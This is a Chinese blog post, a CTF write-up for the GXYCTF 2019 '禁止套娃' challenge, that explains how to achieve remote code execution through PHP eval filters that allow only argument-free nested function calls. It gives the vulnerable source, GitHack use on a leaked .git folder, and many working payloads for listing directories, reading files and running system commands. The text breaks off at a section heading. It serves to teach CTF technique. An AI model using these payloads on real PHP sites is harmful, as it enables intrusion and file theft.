



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta name="referrer" content="no-referrer"/>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="golden的部落阁" href="http://blog.g01den.top/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="golden的部落阁" href="http://blog.g01den.top/atom.xml" />
<link rel="alternate" type="application/json" title="golden的部落阁" href="http://blog.g01den.top/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="Web" />


<link rel="canonical" href="http://blog.g01den.top/posts/88915f6f.html">



  <title>
无参数RCE的一些奇技淫巧 - Web狗的自我安慰 |
golden的部落阁 = golden的部落阁 = subtitle写得真好</title>
<meta name="generator" content="Hexo 7.2.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">无参数RCE的一些奇技淫巧
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2024-04-06 19:06:19">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2024-04-06T19:06:19+08:00">2024-04-06</time>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">golden的部落阁</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
          <img src="https://gitee.com/gou-dengyue/images/raw/master/picture234.jpg">
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/Web/" itemprop="item" rel="index" title="分类于 Web狗的自我安慰"><span itemprop="name">Web狗的自我安慰</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="http://blog.g01den.top/posts/88915f6f.html">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="g01den">
    <meta itemprop="description" content="subtitle写得真好, golden的部落阁">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="golden的部落阁">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h1 id="简述"><a class="markdownIt-Anchor" href="#简述">#</a> 简述：</h1>
<p>​	首先说一下什么是无参数 RCE，对于很多时候，我们通常遇到 PHP 中存在 eval 函数的时候，一般是通过构造：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">system</span>(<span class="string">&quot;cat /flag&quot;</span>);</span><br></pre></td></tr></table></figure>
<p>​	的 payload 来实行攻击的，大不了就出现了一些 waf 需要绕过。但是，有的时候，他们相关的 waf 特别奇葩，像是过滤了所有的字母以及数字什么的，另外，就是这篇博客最主要说明的题目，就是无参数 RCE：</p>
<p>​	像是下面的这一个正则：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="string">&#x27;;&#x27;</span> === <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/[^\W]+\((?R)?\)/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="variable">$_GET</span>[<span class="string">&#x27;star&#x27;</span>])) &#123;    </span><br><span class="line">    <span class="keyword">eval</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;star&#x27;</span>]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>​	经过了它的过滤之后，最后只有 a (b (c ()));	这样的 payload 才不会被过滤了。</p>
<blockquote>
<p>正则表达式 [^\W]+((?R)?) 匹配了一个或多个非标点符号字符（表示函数名），后跟一个括号（表示函数调用）。其中 (?R) 是递归引用，它只能匹配和替换嵌套的函数调用，而不能处理函数参数。使用该正则表达式进行替换后，每个函数调用都会被删除，只剩下一个分号；，而最终结果强等于；时，payload 才能进行下一步。简而言之，无参数 rce 就是不使用参数，而只使用一个个函数最终达到目的。</p>
</blockquote>
<h1 id="相关函数讲解"><a class="markdownIt-Anchor" href="#相关函数讲解">#</a> 相关函数讲解：</h1>
<blockquote>
<ul>
<li>scandir () : 将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组，其中包含当前目录下的所有文件和目录名称（glob () 可替换）</li>
<li>localeconv () ：返回一包含本地数字及货币格式信息的数组。（但是这里数组第一项就是‘.’，这个。的用处很大）</li>
<li>current () ：返回数组中的单元，默认取第一个值。pos () 和 current () 是同一个东西</li>
<li><span class="exturl" data-url="aHR0cHM6Ly9zby5jc2RuLm5ldC9zby9zZWFyY2g/cT1nZXRjd2QmYW1wO3NwbT0xMDAxLjIxMDEuMzAwMS43MDIw">getcwd</span> () : 取得当前工作目录</li>
<li>dirname (): 函数返回路径中的目录部分</li>
<li>array_flip () : 交换数组中的键和值，成功时返回交换后的数组</li>
<li>array_rand () : 从数组中随机取出一个或多个单元</li>
<li>array_reverse (): 将数组内容反转</li>
<li>strrev (): 用于反转给定字符串</li>
<li>getcwd ()：获取当前工作目录路径</li>
<li>dirname () ：函数返回路径中的目录部分。</li>
<li>chdir () ：函数改变当前的目录。</li>
<li>eval ()、assert ()：命令执行</li>
<li>hightlight_file ()、show_source ()、readfile ()：读取文件内容</li>
</ul>
</blockquote>
<p>​	数组移动操作：</p>
<blockquote>
<ul>
<li>end () ： 将内部指针指向数组中的最后一个元素，并输出</li>
<li>next () ：将内部指针指向数组中的下一个元素，并输出</li>
<li>prev () ：将内部指针指向数组中的上一个元素，并输出</li>
<li>reset () ： 将内部指针指向数组中的第一个元素，并输出</li>
<li>each () ： 返回当前元素的键名和键值，并将内部指针向前移动</li>
</ul>
</blockquote>
<h1 id="题目示例gxyctf-2019禁止套娃"><a class="markdownIt-Anchor" href="#题目示例gxyctf-2019禁止套娃">#</a> 题目示例：[GXYCTF 2019] 禁止套娃</h1>
<p>​	先说题目，首先是一个信息搜集，不过这个信息搜集通过多次尝试或者扫后台发现了.git/ 文件夹，猜测是 git 泄露，直接 Githack 下源码，得到 index.php 的内容：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">D:\c\python tools\GitHack&gt;python GitHack.py http://node4.anna.nssctf.cn:28131/.git</span><br><span class="line">[+] Download and parse index file ...</span><br><span class="line">[+] flag.php</span><br><span class="line">[+] index.php</span><br><span class="line">[OK] flag.php</span><br><span class="line">[OK] index.php</span><br></pre></td></tr></table></figure>
<p>​	之后得到 Index.php 源码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">&quot;flag.php&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;flag在哪里呢？&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;exp&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">if</span> (!<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i&#x27;</span>, <span class="variable">$_GET</span>[<span class="string">&#x27;exp&#x27;</span>])) &#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="string">&#x27;;&#x27;</span> === <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/[a-z,_]+\((?R)?\)/&#x27;</span>, <span class="literal">NULL</span>, <span class="variable">$_GET</span>[<span class="string">&#x27;exp&#x27;</span>])) &#123;</span><br><span class="line">            <span class="keyword">if</span> (!<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/et|na|info|dec|bin|hex|oct|pi|log/i&#x27;</span>, <span class="variable">$_GET</span>[<span class="string">&#x27;exp&#x27;</span>])) &#123;</span><br><span class="line">                <span class="comment">// echo $_GET[&#x27;exp&#x27;];</span></span><br><span class="line">                @<span class="keyword">eval</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;exp&#x27;</span>]);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span>&#123;</span><br><span class="line">                <span class="keyword">die</span>(<span class="string">&quot;还差一点哦！&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;再好好想想！&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;还想读flag，臭弟弟！&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// highlight_file(__FILE__);</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>​	这里只需要关心第二层绕过，主要考点应该是这一层，也就是无参数 RCE。</p>
<h1 id="1常规方法"><a class="markdownIt-Anchor" href="#1常规方法">#</a> 1. 常规方法：</h1>
<p>​	通常情况下， 我们想要读取该目录的文件内容，那么，常规的方法就是如下，不过，先给一个 payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?exp=<span class="title function_ invoke__">show_source</span>(<span class="title function_ invoke__">next</span>(<span class="title function_ invoke__">array_reverse</span>(<span class="title function_ invoke__">scandir</span>(<span class="title function_ invoke__">current</span>(<span class="title function_ invoke__">localeconv</span>())))));</span><br></pre></td></tr></table></figure>
<p>​	首先，通过通过 localeconv () 来 ，返回一包含本地数字及货币格式信息的数组，又因为数组的第一项是 '.，因此可以通过 current () （返回数组中的单元，默认取第一个值）来获取数组中的第一个参数也就是那一个点：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//payload  			?exp=var_dump(localeconv());</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//output:</span></span><br><span class="line"><span class="keyword">array</span>(<span class="number">18</span>) &#123; [<span class="string">&quot;decimal_point&quot;</span>]=&gt; <span class="keyword">string</span>(<span class="number">1</span>) <span class="string">&quot;.&quot;</span> [<span class="string">&quot;thousands_sep&quot;</span>]=&gt; <span class="keyword">string</span>(<span class="number">0</span>) <span class="string">&quot;&quot;</span> [<span class="string">&quot;int_curr_symbol&quot;</span>]=&gt; <span class="keyword">string</span>(<span class="number">0</span>) <span class="string">&quot;&quot;</span> [<span class="string">&quot;currency_symbol&quot;</span>]=&gt; <span class="keyword">string</span>(<span class="number">0</span>) <span class="string">&quot;&quot;</span> [<span class="string">&quot;mon_decimal_point&quot;</span>]=&gt; <span class="keyword">string</span>(<span class="number">0</span>) <span class="string">&quot;&quot;</span> [<span class="string">&quot;mon_thousands_sep&quot;</span>]=&gt; <span class="keyword">string</span>(<span class="number">0</span>) <span class="string">&quot;&quot;</span> [<span class="string">&quot;positive_sign&quot;</span>]=&gt; <span class="keyword">string</span>(<span class="number">0</span>) <span class="string">&quot;&quot;</span> [<span class="string">&quot;negative_sign&quot;</span>]=&gt; <span class="keyword">string</span>(<span class="number">0</span>) <span class="string">&quot;&quot;</span> [<span class="string">&quot;int_frac_digits&quot;</span>]=&gt; <span class="keyword">int</span>(<span class="number">127</span>) [<span class="string">&quot;frac_digits&quot;</span>]=&gt; <span class="keyword">int</span>(<span class="number">127</span>) [<span class="string">&quot;p_cs_precedes&quot;</span>]=&gt; <span class="keyword">int</span>(<span class="number">127</span>) [<span class="string">&quot;p_sep_by_space&quot;</span>]=&gt; <span class="keyword">int</span>(<span class="number">127</span>) [<span class="string">&quot;n_cs_precedes&quot;</span>]=&gt; <span class="keyword">int</span>(<span class="number">127</span>) [<span class="string">&quot;n_sep_by_space&quot;</span>]=&gt; <span class="keyword">int</span>(<span class="number">127</span>) [<span class="string">&quot;p_sign_posn&quot;</span>]=&gt; <span class="keyword">int</span>(<span class="number">127</span>) [<span class="string">&quot;n_sign_posn&quot;</span>]=&gt; <span class="keyword">int</span>(<span class="number">127</span>) [<span class="string">&quot;grouping&quot;</span>]=&gt; <span class="keyword">array</span>(<span class="number">0</span>) &#123; &#125; [<span class="string">&quot;mon_grouping&quot;</span>]=&gt; <span class="keyword">array</span>(<span class="number">0</span>) &#123; &#125; &#125;</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//payload = 		?exp=var_dump(current(localeconv()));</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//output  </span></span><br><span class="line"><span class="keyword">string</span>(<span class="number">1</span>) <span class="string">&quot;.&quot;</span></span><br></pre></td></tr></table></figure>
<p>​	之后，通过 scandir () 返回当前目录中的所有文件和目录的列表：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//paylaod			?exp=var_dump(scandir(current(localeconv())));</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//output:</span></span><br><span class="line"><span class="keyword">array</span>(<span class="number">5</span>) &#123; [<span class="number">0</span>]=&gt; <span class="keyword">string</span>(<span class="number">1</span>) <span class="string">&quot;.&quot;</span> [<span class="number">1</span>]=&gt; <span class="keyword">string</span>(<span class="number">2</span>) <span class="string">&quot;..&quot;</span> [<span class="number">2</span>]=&gt; <span class="keyword">string</span>(<span class="number">4</span>) <span class="string">&quot;.git&quot;</span> [<span class="number">3</span>]=&gt; <span class="keyword">string</span>(<span class="number">8</span>) <span class="string">&quot;flag.php&quot;</span> [<span class="number">4</span>]=&gt; <span class="keyword">string</span>(<span class="number">9</span>) <span class="string">&quot;index.php&quot;</span> &#125;</span><br></pre></td></tr></table></figure>
<p>​	刚好，这个题目稍微凑巧了，flag 文件刚好在倒数第二个文件中，因此可以使用 array_reverse () 来反转这个数组：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//paylaod			?exp=var_dump(array_reverse(scandir(current(localeconv()))));</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//output:</span></span><br><span class="line"><span class="keyword">array</span>(<span class="number">5</span>) &#123; [<span class="number">0</span>]=&gt; <span class="keyword">string</span>(<span class="number">9</span>) <span class="string">&quot;index.php&quot;</span> [<span class="number">1</span>]=&gt; <span class="keyword">string</span>(<span class="number">8</span>) <span class="string">&quot;flag.php&quot;</span> [<span class="number">2</span>]=&gt; <span class="keyword">string</span>(<span class="number">4</span>) <span class="string">&quot;.git&quot;</span> [<span class="number">3</span>]=&gt; <span class="keyword">string</span>(<span class="number">2</span>) <span class="string">&quot;..&quot;</span> [<span class="number">4</span>]=&gt; <span class="keyword">string</span>(<span class="number">1</span>) <span class="string">&quot;.&quot;</span> &#125;</span><br></pre></td></tr></table></figure>
<p>​	之后，通过 next () 来操作指针，指向 flag 文件：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//paylaod			?exp=var_dump(next(array_reverse(scandir(current(localeconv())))));</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//output:</span></span><br><span class="line"><span class="keyword">string</span>(<span class="number">8</span>) <span class="string">&quot;flag.php&quot;</span></span><br></pre></td></tr></table></figure>
<p>​	之后就可以通过 highlight_file () 来读取 flag 文件的内容了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//paylaod			?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//output:</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$flag</span> = <span class="string">&#x27;NSSCTF&#123;fe7192e9-edcb-4217-9bcf-220940f8c20d&#125;&#x27;</span>;</span><br></pre></td></tr></table></figure>
<h1 id="2session_id"><a class="markdownIt-Anchor" href="#2session_id">#</a> 2.session_id()</h1>
<p>​	使用条件：当请求头中有 cookie 时（或者走投无路手动添加 cookie 头也行，有些 CTF 题不会卡）</p>
<p>​	首先我们需要开启 session_start () 来保证 session_id () 的使用，session_id 可以用来获取当前会话 ID，也就是说它可以抓取 PHPSESSID 后面的东西，但是 phpsession 不允许 () 出现<br>
​	在 burp 中，构造一个 payload 为：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?exp=<span class="title function_ invoke__">readfile</span>(<span class="title function_ invoke__">session_id</span>(<span class="title function_ invoke__">session_start</span>()));</span><br></pre></td></tr></table></figure>
<p>​	随后，将 Cookie 改为：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PHPSESSID=flag.php </span><br></pre></td></tr></table></figure>
<p>​	最后成功读取到了 flag 文件</p>
<h1 id="3getallheaders"><a class="markdownIt-Anchor" href="#3getallheaders">#</a> 3.getallheaders()</h1>
<p>​	getallheaders () 返回当前请求的所有请求头信息，局限于 Apache（apache_request_headers () 和 getallheaders () 功能相似，可互相替代，不过也是局限于 Apache）</p>
<p>​	当确定能够返回时，我们就能在数据包最后一行加上一个请求头，写入恶意代码，再用 end () 函数指向最后一个请求头，使其执行，payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?exp=<span class="title function_ invoke__">var_dump</span>(<span class="title function_ invoke__">end</span>(<span class="title function_ invoke__">getallheaders</span>()));</span><br></pre></td></tr></table></figure>
<p>​	不过，这个题目我用这个方法的时候失败了，因为第三层绕过过滤了 et，然后 get 单词存在被过滤单词，无法绕过，所以用一下别人的图片：</p>
<p><img data-src="https://img-blog.csdnimg.cn/direct/8c3f2e46a74540bca932fdbf51cbb0e9.png#pic_center" alt="在这里插入图片描述"></p>
<h1 id="4get_defined_vars"><a class="markdownIt-Anchor" href="#4get_defined_vars">#</a> 4.get_defined_vars()</h1>
<p>​	相较于 getallheaders（）更加具有普遍性，它可以回显全局变量<span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mrow></mrow><mi>G</mi></msub><mi>E</mi><mi>T</mi><mtext>、</mtext></mrow><annotation encoding="application/x-tex">_GET、</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.83333em;vertical-align:-0.15em;"></span><span class="mord"><span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.32833099999999993em;"><span style="top:-2.5500000000000003em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">G</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mord mathnormal" style="margin-right:0.05764em;">E</span><span class="mord mathnormal" style="margin-right:0.13889em;">T</span><span class="mord cjk_fallback">、</span></span></span></span>_POST、<span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mrow></mrow><mi>F</mi></msub><mi>I</mi><mi>L</mi><mi>E</mi><mi>S</mi><mtext>、</mtext></mrow><annotation encoding="application/x-tex">_FILES、</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.83333em;vertical-align:-0.15em;"></span><span class="mord"><span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.32833099999999993em;"><span style="top:-2.5500000000000003em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight" style="margin-right:0.13889em;">F</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mord mathnormal" style="margin-right:0.07847em;">I</span><span class="mord mathnormal">L</span><span class="mord mathnormal" style="margin-right:0.05764em;">E</span><span class="mord mathnormal" style="margin-right:0.05764em;">S</span><span class="mord cjk_fallback">、</span></span></span></span>_COOKIE，</p>
<p>返回数组顺序为<span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mrow></mrow><mi>G</mi></msub><mi>E</mi><mi>T</mi><mo>−</mo><mo>−</mo><mo>&gt;</mo></mrow><annotation encoding="application/x-tex">_GET--&gt;</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.83333em;vertical-align:-0.15em;"></span><span class="mord"><span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.32833099999999993em;"><span style="top:-2.5500000000000003em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">G</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mord mathnormal" style="margin-right:0.05764em;">E</span><span class="mord mathnormal" style="margin-right:0.13889em;">T</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">−</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:0.66666em;vertical-align:-0.08333em;"></span><span class="mord">−</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">&gt;</span></span></span></span>_POST–&gt;<span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mrow></mrow><mi>C</mi></msub><mi>O</mi><mi>O</mi><mi>K</mi><mi>I</mi><mi>E</mi><mo>−</mo><mo>−</mo><mo>&gt;</mo></mrow><annotation encoding="application/x-tex">_COOKIE--&gt;</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.83333em;vertical-align:-0.15em;"></span><span class="mord"><span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.32833099999999993em;"><span style="top:-2.5500000000000003em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight" style="margin-right:0.07153em;">C</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mord mathnormal" style="margin-right:0.02778em;">O</span><span class="mord mathnormal" style="margin-right:0.02778em;">O</span><span class="mord mathnormal" style="margin-right:0.07153em;">K</span><span class="mord mathnormal" style="margin-right:0.07847em;">I</span><span class="mord mathnormal" style="margin-right:0.05764em;">E</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">−</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:0.66666em;vertical-align:-0.08333em;"></span><span class="mord">−</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">&gt;</span></span></span></span>_FILES</p>
<p>​	由于题目中过滤了</p>
<p>​	首先确认是否有回显：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">get_defined_vars</span>());</span><br></pre></td></tr></table></figure>
<p>​	假如说原本只有一个参数 a，那么可以多加一个参数 b，后面写入恶意语句，payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a=<span class="keyword">eval</span>(<span class="title function_ invoke__">end</span>(<span class="title function_ invoke__">current</span>(<span class="title function_ invoke__">get_defined_vars</span>())));&amp;b=<span class="title function_ invoke__">system</span>(<span class="string">&#x27;ls /&#x27;</span>);</span><br></pre></td></tr></table></figure>
<p>​	把 eval 换成 assert 也行 ，能执行 system (‘ls /’) 就行</p>
<h1 id="5chdir"><a class="markdownIt-Anchor" href="#5chdir">#</a> 5.chdir()</h1>
<p>​	实在无法 rce，可以考虑目录遍历进行文件读取，不过这里由于题目的过滤有点恶心人，所以只好记录一下方法了，有了机会再进行实践。</p>
<p>​	利用 <code>getcwd()</code>  获取当前目录：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">var_dump</span>(<span class="title function_ invoke__">getcwd</span>());</span><br></pre></td></tr></table></figure>
<p>​	结合 dirname () 列出当前工作目录的父目录中的所有文件和目录:.</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">var_dump</span>(<span class="title function_ invoke__">scandir</span>(<span class="title function_ invoke__">dirname</span>(<span class="title function_ invoke__">getcwd</span>())));</span><br></pre></td></tr></table></figure>
<p>​	 读上一级文件名：</p>
<blockquote>
<p>?code=show_source(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd())))))));</p>
<p>?code=show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(getcwd())))))))))));</p>
<p>?code=show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion())))))))))))))));</p>
</blockquote>
<p>​	读根目录:</p>
<p>​	ord () 函数和 chr () 函数：只能对第一个字符进行转码，ord () 编码，chr) 解码，有概率会解码出斜杠读取根目录</p>
<blockquote>
<p>?code=print_r(scandir(chr(ord(strrev(crypt(serialize(array())))))));</p>
</blockquote>
<p>​	要用 chdir () 固定，payload：</p>
<blockquote>
<p>?code=show_source(array_rand(array_flip(scandir(dirname(chdir(chr(ord(strrev(crypt(serialize(array() )))))))))));</p>
</blockquote>
<h1 id="6array_rand赌狗必备法"><a class="markdownIt-Anchor" href="#6array_rand赌狗必备法">#</a> 6.array_rand ()# 赌狗必备法：</h1>
